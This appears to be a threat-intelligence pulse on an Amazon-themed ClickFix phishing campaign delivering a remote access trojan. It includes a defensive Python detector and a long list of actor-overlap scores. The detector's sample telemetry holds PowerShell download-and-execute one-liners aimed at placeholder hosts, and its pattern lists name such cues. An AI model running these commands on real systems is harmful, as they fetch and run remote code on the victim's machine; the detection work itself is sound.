Trusted Design

From Fake Amazon Security Alert to HarborWatch Agent: ClickFix Delivery of a Custom Monitoring RAT

Summary

A phishing campaign abuses Amazon's brand to deliver HarborWatch Agent, a custom remote access trojan (RAT). The chain starts with emails that imitate Amazon security notifications about suspicious account activity and link to lookalike domains. There the victim is shown a fake CAPTCHA verification page built on the ClickFix technique: it instructs the user to paste and run a PowerShell command on their own machine, so initial execution is performed by the victim rather than by an exploit. The multi-stage infection downloads a binary named mysql.exe from compromised infrastructure, which communicates with a Chinese-language command-and-control panel branded Harbor Sentinel. The RAT collects extensive host information, including OS details, architecture, CPU count, disk usage, memory status and network configuration, and exfiltrates it through API endpoints to the operator's monitoring infrastructure.
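The delivery described above leaves a recognisable shape in process-creation telemetry: a PowerShell process spawned from the Run dialog (explorer.exe as parent) with download-and-execute and hidden-window switches, followed by a binary named mysql.exe starting from a user-writable folder. The detector below is an added example, not code from the pulse or from the HarborWatch/Harbor Sentinel operators. It assumes Sysmon Event ID 1 style field names (Image, ParentImage, CommandLine); the cue lists, thresholds, sample events and example.invalid hosts are constructed for the example, and the only page-derived detail is the loader's file name mysql.exe. It also decodes -EncodedCommand payloads first, because cues hidden in base64 otherwise never reach the pattern match.

```python
"""Added example: flag ClickFix-style executions in Windows process-creation telemetry.

Events are plain dicts using Sysmon Event ID 1 style field names (Image, ParentImage,
CommandLine). Cue lists, thresholds and sample events are constructed for the example.
"""
import base64
import re
from typing import Optional

# Typical cues of a pasted ClickFix one-liner (assumed, not taken from the pulse).
DOWNLOAD_CUES = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|"
    r"start-bitstransfer|\bcurl\b|\bwget\b|\bmshta\b)", re.IGNORECASE)
EXEC_CUES = re.compile(r"(\biex\b|invoke-expression|start-process|\bsaps\b)", re.IGNORECASE)
EVASION_CUES = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-ex(?:ecutionpolicy)?\s+bypass|-nop\b|"
    r"-noprofile|-nonint|-enc(?:odedcommand)?\b|-e\s+[A-Za-z0-9+/=]{20,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
# Folders a non-elevated user (and hence a pasted command) can write to.
USER_WRITABLE = re.compile(
    r"\\(?:AppData|Temp|Downloads|ProgramData|Public|Users\\[^\\]+)\\", re.IGNORECASE)
LOADER_NAME = "mysql.exe"  # file name the summary reports for the downloaded stage


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind -EncodedCommand/-enc/-e, or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def effective_command(cmdline: str) -> str:
    """Command line plus its decoded payload, so cues hidden in base64 are matchable."""
    decoded = decode_encoded_command(cmdline)
    return cmdline if decoded is None else cmdline + "\n" + decoded


def classify_event(ev: dict) -> dict:
    """Score one process-creation event; returns verdict, reasons and any URLs seen."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = effective_command(ev.get("CommandLine", ""))
    reasons = []
    shells = ("\\powershell.exe", "\\pwsh.exe")

    if image.endswith(shells):
        # The fake CAPTCHA tells the user to paste into Win+R, so explorer.exe is the parent.
        if parent.endswith("\\explorer.exe"):
            reasons.append("powershell spawned by explorer.exe (Run dialog pattern)")
        if DOWNLOAD_CUES.search(cmd) and EXEC_CUES.search(cmd):
            reasons.append("download-and-execute cues in command line")
        if EVASION_CUES.search(cmd):
            reasons.append("hidden window / policy bypass / encoded command switches")
    if image.endswith("\\" + LOADER_NAME) and USER_WRITABLE.search(ev.get("Image", "")):
        # A real MySQL client lives under Program Files; the loader does not.
        reasons.append(LOADER_NAME + " running from a user-writable path")
        if parent.endswith(shells):
            reasons.append(LOADER_NAME + " launched by PowerShell")

    verdict = "clickfix-likely" if len(reasons) >= 2 else ("suspicious" if reasons else "benign")
    return {"verdict": verdict, "reasons": reasons, "urls": URL_RE.findall(cmd)}


def scan(events: list) -> list:
    """Classify every event; returns (EventId, result) pairs in input order."""
    return [(ev["EventId"], classify_event(ev)) for ev in events]


def _encode_ps(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; example.invalid hosts are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/verify.ps1 | iex"'},
    {"EventId": 2, "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -NoLogo -c Get-Process"},
    {"EventId": 3, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\alice\AppData\Roaming\mysql.exe",
     "CommandLine": r"C:\Users\alice\AppData\Roaming\mysql.exe"},
    {"EventId": 4, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\MySQL\MySQL Server 8.0\bin\mysql.exe",
     "CommandLine": "mysql -u root -p"},
    {"EventId": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + _encode_ps("iwr http://example.invalid/a.ps1 | iex")},
]

if __name__ == "__main__":
    for event_id, result in scan(SAMPLE_EVENTS):
        print(event_id, result["verdict"], "; ".join(result["reasons"]), result["urls"])
```

Two signals are deliberately required before an event is rated clickfix-likely: explorer.exe launching PowerShell is common on its own, and a hidden-window switch alone is how many legitimate scheduled scripts run. The mysql.exe rule keys on the path, not the name, because a genuine MySQL client under Program Files should stay quiet while the same name under AppData or Temp should not.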

Created: 2026-06-10

Indicators

Similar Pulses

No similar Pulses were found.

Threat actors related to this Pulse (fact-based)

The scores below measure overlap between this Pulse's ATT&CK technique tags and each actor's catalogued techniques (the "Matched TTPs" listed under each name); they are a similarity measure, not attribution. Many of the matched techniques (for example Plist Modification, Linux and Mac Permissions or Container Administration Command) are not described in the campaign summary above, so treat the list as a pivot for further research rather than as evidence of who operates HarborWatch Agent.

APT28

Score: 21.42
Matched TTPs:
  • T1222.002 - Linux and Mac Permissions
  • T1098.007 - Additional Local or Domain Groups
  • T1547.002 - Authentication Package
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1574.009 - Path Interception by Unquoted Path
  • T1585 - Establish Accounts

APT29

Score: 32.53
Matched TTPs:
  • T1222.002 - Linux and Mac Permissions
  • T1070.006 - Timestomp
  • T1584.008 - Network Devices
  • T1202 - Indirect Command Execution
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1547.008 - LSASS Driver
  • T1568 - Dynamic Resolution
  • T1556.008 - Network Provider DLL
  • T1027.004 - Compile After Delivery

Scattered Spider

Score: 28.86
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1609 - Container Administration Command
  • T1083 - File and Directory Discovery
  • T1087.004 - Cloud Account
  • T1556.008 - Network Provider DLL
  • T1597 - Search Closed Sources

FIN4

Score: 4.13
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy

Andariel

Score: 5.58
Matched TTPs:
  • T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay
  • T1055.004 - Asynchronous Procedure Call

Magic Hound

Score: 32.11
Matched TTPs:
  • T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay
  • T1070.006 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1010 - Application Window Discovery
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1601.001 - Patch System Image

HAFNIUM

Score: 9.83
Matched TTPs:
  • T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay
  • T1070.006 - Timestomp
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances

Turla

Score: 24.45
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1070.006 - Timestomp
  • T1518.001 - Security Software Discovery
  • T1547.002 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image

APT32

Score: 23.66
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1547.002 - Authentication Package
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1562.001 - Disable or Modify Tools
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image

Saint Bear

Score: 3.77
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1597 - Search Closed Sources

FIN6

Score: 9.26
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1518.001 - Security Software Discovery
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

Sidewinder

Score: 8.59
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1601.001 - Patch System Image

MuddyWater

Score: 20.03
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1518.002 - Backup Software Discovery
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image

Earth Lusca

Score: 16.50
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1110.003 - Password Spraying
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery

Winter Vivern

Score: 12.37
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1090 - Proxy
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File

Silence

Score: 8.98
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1547.011 - Plist Modification
  • T1562.001 - Disable or Modify Tools
  • T1601.001 - Patch System Image

Contagious Interview

Score: 22.36
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1547.002 - Authentication Package
  • T1546.012 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image

LazyScripter

Score: 5.35
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1601.001 - Patch System Image

TA505

Score: 14.62
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1550.001 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

FIN7

Score: 10.68
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1562.001 - Disable or Modify Tools
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image

Cobalt Group

Score: 18.18
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1518.002 - Backup Software Discovery
  • T1598.004 - Spearphishing Voice
  • T1027.014 - Polymorphic Code
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image

Higaisa

Score: 8.25
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1665 - Hide Infrastructure

Kimsuky

Score: 37.67
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1213.006 - Databases
  • T1098.007 - Additional Local or Domain Groups
  • T1547.002 - Authentication Package
  • T1555.003 - Credentials from Web Browsers
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1546.008 - Accessibility Features
  • T1609 - Container Administration Command
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.014 - Polymorphic Code
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure

Indrik Spider

Score: 6.06
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1546.012 - Image File Execution Options Injection
  • T1597 - Search Closed Sources

Leafminer

Score: 8.37
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1547.005 - Security Support Provider
  • T1601.001 - Patch System Image

Mustang Panda

Score: 25.52
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1548.003 - Sudo and Sudo Caching
  • T1136.003 - Cloud Account
  • T1055.005 - Thread Local Storage

Star Blizzard

Score: 12.15
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1546.012 - Image File Execution Options Injection
  • T1609 - Container Administration Command

HEXANE

Score: 14.55
Matched TTPs:
  • T1070.006 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1601.001 - Patch System Image

Gamaredon Group

Score: 27.69
Matched TTPs:
  • T1070.006 - Timestomp
  • T1550.001 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1090 - Proxy
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1601.001 - Patch System Image
  • T1059.001 - PowerShell

TA2541

Score: 6.06
Matched TTPs:
  • T1070.006 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1597 - Search Closed Sources

Lotus Blossom

Score: 5.95
Matched TTPs:
  • T1070.006 - Timestomp
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

FIN13

Score: 17.37
Matched TTPs:
  • T1070.006 - Timestomp
  • T1584.008 - Network Devices
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1134.001 - Token Impersonation/Theft

Volt Typhoon

Score: 33.05
Matched TTPs:
  • T1070.006 - Timestomp
  • T1686.003 - Windows Host Firewall
  • T1556.002 - Password Filter DLL
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1055.004 - Asynchronous Procedure Call
  • T1561.001 - Disk Content Wipe
  • T1584.002 - DNS Server
  • T1665 - Hide Infrastructure

FIN8

Score: 4.61
Matched TTPs:
  • T1070.006 - Timestomp
  • T1601.001 - Patch System Image

Mustard Tempest

Score: 4.54
Matched TTPs:
  • T1682 - Query Public AI Services

Daggerfly

Score: 9.37
Matched TTPs:
  • T1584.008 - Network Devices
  • T1530 - Data from Cloud Storage
  • T1573 - Encrypted Channel

GALLIUM

Score: 12.28
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account

Dragonfly

Score: 16.75
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1531 - Account Access Removal
  • T1573 - Encrypted Channel
  • T1027.004 - Compile After Delivery

Ke3chang

Score: 15.59
Matched TTPs:
  • T1584.008 - Network Devices
  • T1590.006 - Network Security Appliances
  • T1553.003 - SIP and Trust Provider Hijacking
  • T1090 - Proxy
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account

Agrius

Score: 8.13
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources

APT41

Score: 15.45
Matched TTPs:
  • T1584.008 - Network Devices
  • T1590.006 - Network Security Appliances
  • T1547.008 - LSASS Driver
  • T1055.004 - Asynchronous Procedure Call
  • T1573 - Encrypted Channel
  • T1574.009 - Path Interception by Unquoted Path

APT5

Score: 6.09
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1055.004 - Asynchronous Procedure Call

menuPass

Score: 13.91
Matched TTPs:
  • T1584.008 - Network Devices
  • T1550.001 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

Threat Group-3390

Score: 19.58
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1010 - Application Window Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1573 - Encrypted Channel
  • T1574.009 - Path Interception by Unquoted Path

Wizard Spider

Score: 15.60
Matched TTPs:
  • T1584.008 - Network Devices
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

Ember Bear

Score: 8.55
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools

Storm-0501

Score: 15.26
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1686.003 - Windows Host Firewall
  • T1027.014 - Polymorphic Code
  • T1564.001 - Hidden Files and Directories

Sandworm Team

Score: 35.53
Matched TTPs:
  • T1518.001 - Security Software Discovery
  • T1484.002 - Trust Modification
  • T1686.003 - Windows Host Firewall
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1546.012 - Image File Execution Options Injection
  • T1546.008 - Accessibility Features
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1562.001 - Disable or Modify Tools
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image

Sea Turtle

Score: 6.90
Matched TTPs:
  • T1518.001 - Security Software Discovery
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers

Leviathan

Score: 22.40
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1546.012 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1027.014 - Polymorphic Code
  • T1561.001 - Disk Content Wipe

PROMETHIUM

Score: 3.84
Matched TTPs:
  • T1530 - Data from Cloud Storage

Patchwork

Score: 8.54
Matched TTPs:
  • T1530 - Data from Cloud Storage
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure

UNC3886

Score: 12.12
Matched TTPs:
  • T1556.002 - Password Filter DLL
  • T1597 - Search Closed Sources
  • T1561.001 - Disk Content Wipe
  • T1027.004 - Compile After Delivery

Akira

Score: 10.47
Matched TTPs:
  • T1137.005 - Outlook Rules
  • T1597 - Search Closed Sources
  • T1601 - Modify System Image

Storm-1811

Score: 6.06
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1486 - Data Encrypted for Impact

APT42

Score: 5.27
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances

APT1

Score: 7.01
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

ZIRCONIUM

Score: 7.30
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery

RedEcho

Score: 3.92
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1562.001 - Disable or Modify Tools

OilRig

Score: 6.49
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

Lazarus Group

Score: 31.56
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1546.012 - Image File Execution Options Injection
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1069.001 - Local Groups
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1055.005 - Thread Local Storage
  • T1665 - Hide Infrastructure
  • T1059.001 - PowerShell

EXOTIC LILY

Score: 3.80
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1546.012 - Image File Execution Options Injection

Silent Librarian

Score: 11.09
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1546.012 - Image File Execution Options Injection
  • T1546.008 - Accessibility Features
  • T1609 - Container Administration Command

APT38

Score: 15.89
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1055.004 - Asynchronous Procedure Call
  • T1590 - Gather Victim Network Information
  • T1597 - Search Closed Sources
  • T1565.002 - Transmitted Data Manipulation

Moonstone Sleet

Score: 8.20
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1573 - Encrypted Channel

TeamTNT

Score: 13.20
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1110.003 - Password Spraying
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1665 - Hide Infrastructure

CURIUM

Score: 11.16
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1546.012 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File

RedCurl

Score: 9.25
Matched TTPs:
  • T1016.002 - Wi-Fi Discovery
  • T1090 - Proxy
  • T1027.004 - Compile After Delivery

LAPSUS$

Score: 14.35
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1609 - Container Administration Command
  • T1556.008 - Network Provider DLL
  • T1601 - Modify System Image

SilverTerrier

Score: 3.29
Matched TTPs:
  • T1547.002 - Authentication Package

BackdoorDiplomacy

Score: 3.50
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1055.004 - Asynchronous Procedure Call

Deep Panda

Score: 7.80
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1547.008 - LSASS Driver
  • T1027.014 - Polymorphic Code

APT39

Score: 8.83
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery

Tropic Trooper

Score: 15.22
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1055.004 - Asynchronous Procedure Call
  • T1136.003 - Cloud Account
  • T1665 - Hide Infrastructure

Moses Staff

Score: 3.24
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances

Fox Kitten

Score: 6.91
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1547.008 - LSASS Driver
  • T1601.001 - Patch System Image

Tonto Team

Score: 6.85
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1027.004 - Compile After Delivery

BlackByte

Score: 11.14
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1134.001 - Token Impersonation/Theft
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources

Medusa Group

Score: 9.18
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1546.012 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

APT3

Score: 11.21
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1547.008 - LSASS Driver
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account

Salt Typhoon

Score: 3.84
Matched TTPs:
  • T1110.003 - Password Spraying

Play

Score: 8.57
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1597 - Search Closed Sources
  • T1574.009 - Path Interception by Unquoted Path
  • T1601.001 - Patch System Image

admin@338

Score: 3.20
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

APT19

Score: 6.08
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image

SideCopy

Score: 5.60
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1584.002 - DNS Server

Stealth Falcon

Score: 3.44
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account

Chimera

Score: 9.87
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure

Axiom

Score: 3.29
Matched TTPs:
  • T1547.008 - LSASS Driver

INC Ransom

Score: 7.15
Matched TTPs:
  • T1083 - File and Directory Discovery
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources

Velvet Ant

Score: 5.93
Matched TTPs:
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools

ToddyCat

Score: 4.57
Matched TTPs:
  • T1055.004 - Asynchronous Procedure Call
  • T1665 - Hide Infrastructure

APT12

Score: 4.54
Matched TTPs:
  • T1055.002 - Portable Executable Injection

LuminousMoth

Score: 5.41
Matched TTPs:
  • T1087.004 - Cloud Account
  • T1574.009 - Path Interception by Unquoted Path

Confucius

Score: 4.81
Matched TTPs:
  • T1087.004 - Cloud Account
  • T1665 - Hide Infrastructure

BRONZE BUTLER

Score: 4.14
Matched TTPs:
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery

Aquatic Panda

Score: 3.66
Matched TTPs:
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

Rocke

Score: 6.54
Matched TTPs:
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1027.004 - Compile After Delivery

WIRTE

Score: 5.14
Matched TTPs:
  • T1562.001 - Disable or Modify Tools
  • T1027.014 - Polymorphic Code

DarkVishnya

Score: 6.94
Matched TTPs:
  • T1562.001 - Disable or Modify Tools
  • T1213.003 - Code Repositories

DarkHydrus

Score: 4.13
Matched TTPs:
  • T1531 - Account Access Removal

TA551

Score: 4.61
Matched TTPs:
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image

GOLD SOUTHFIELD

Score: 4.79
Matched TTPs:
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image

Threat actors related to this Pulse (inference-based)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1546.012 - Image File Execution Options Injection
  • T1555.003 - Credentials from Web Browsers
  • T1027.014 - Polymorphic Code
  • T1027.004 - Compile After Delivery
  • T1087.004 - Cloud Account
  • T1546.008 - Accessibility Features
  • T1597 - Search Closed Sources
  • T1213.006 - Databases
  • T1547.002 - Authentication Package
  • T1609 - Container Administration Command
  • T1665 - Hide Infrastructure
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1601.001 - Patch System Image

Sandworm Team

Score: 0.66
Matched TTPs:
  • T1573 - Encrypted Channel
  • T1055.004 - Asynchronous Procedure Call
  • T1546.012 - Image File Execution Options Injection
  • T1555.003 - Credentials from Web Browsers
  • T1484.002 - Trust Modification
  • T1562.001 - Disable or Modify Tools
  • T1686.003 - Windows Host Firewall
  • T1087.004 - Cloud Account
  • T1546.008 - Accessibility Features
  • T1016.002 - Wi-Fi Discovery
  • T1518.001 - Security Software Discovery
  • T1098.007 - Additional Local or Domain Groups
  • T1601.001 - Patch System Image

Volt Typhoon

Score: 0.61
Matched TTPs:
  • T1556.002 - Password Filter DLL
  • T1555.003 - Credentials from Web Browsers
  • T1070.006 - Timestomp
  • T1686.003 - Windows Host Firewall
